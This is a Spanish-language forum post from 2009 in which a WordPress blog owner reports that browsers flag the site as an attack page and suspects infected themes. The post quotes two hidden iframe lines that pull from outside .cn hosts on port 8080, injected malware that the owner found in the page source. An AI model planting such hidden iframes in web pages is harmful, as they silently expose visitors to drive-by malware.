Ver Mensaje Individual
  #1 (permalink)  
Antiguo 24/08/2009, 16:19
Avatar de ghidalgoram
ghidalgoram
 
Fecha de Ingreso: marzo-2008
Ubicación: Costa Rica
Mensajes: 446
Antigüedad: 16 años, 8 meses
Puntos: 7
Exclamación "Virus" ó código malicioso en los Themes de Wordpress ?

Hace días hice la siguiente consulta en el siguiente link http://www.forosdelweb.com/f118/inde...blanco-728407/

(Favor leer el contenido del anterior link.)

Pude resolver el problema (hasta el momento).
Dos días después, me encuentro con la sorpresa de que Google detecta el sitio como sospechoso. Al ingresar al Blog, me pone lo siguiente:

Cita:
¡Este sitio es una web atacante!

Este sitio web en www.URL.com ha sido reportado como una web atacante y ha sido bloqueada basándose en sus preferencias de seguridad.

Los sitios atacantes intentan instalar programas que pueden robar información privada, usar su ordenador para atacar otros o dañar su sistema.

Algunos sitios atacantes distribuyen intencionalmente software dañino, pero muchos son comprometidos sin el conocimiento o permiso de sus propietarios.


..

Yo doy fe de que no tengo ninguna mala intensión como lo hacen otros sitios.
Este mensaje aparece con Fire Fox, Chrome, Safari. Con IE8 no aparece, pero donde voy a ver el código de cualquiera de los Post, aparece la página en blanco. Y donde voy a ver el código fuente aparece lo siguiente:

Código HTML:
<iframe src="http://martpictureexistence.cn:8080/index.php" width=140 height=159 style="visibility: hidden"></iframe> 
En otros aparece lo siguiente:

Código HTML:
<iframe src="http://brandnamemart.cn:8080/index.php" width=199 height=168 style="visibility: hidden"></iframe> 

Busqué en Google los nombres "brandnamemart" y

Desde luego esto no es normal. Mi única conclusión, es que el problema está en los "Themes" que tenía instalados en el blog.

Voy a dar la lista de los "themes" que están instalados (aunque aclaro que no todos sean sospechosos).

blocks2
clockworksimple
come-my-lady-11
corporate
nonzero
silverlight
tropicala



Casi estoy seguro que el problema está en los "Themes", porque hace dos días, hice una actualización desde 0, es decir,,, borré completamente la carpeta donde estaba el blog. Respaldé la base de datos y de nuevo di crear una carpeta para el blog con el mismo nombre, subí los archivos que traía la última actualización de Wordpress.org y realicé los pasos para actualizar el blog. Hasta aqui todo nuevo. Lo único viejo que subí al servidor fueron los "themes" que estaban instalados cuando se empezó a dar el problema. Es aquí donde tengo mis fuertes sospechas. Algunos de los sitios que trabajamos se ha afectado con este mismo problema y creo que el problema viene por el ó alguno de los "Themes".

Yo voy a eliminar del servidor todos éstos "Themes" con exepción del "Clásico" y el "Default".

Dentro de pocos días les comentaré los resultados.

Luego realizar de nuevo la actualización (ni modo )

Pero me gustaría saber la opinión de algunos de ustedes.
Que me dicen amigos ?
Que me recomiendan ?
Alguién tuvo la misma experiencia ?

Saludos
Gracias.
__________________
Loading...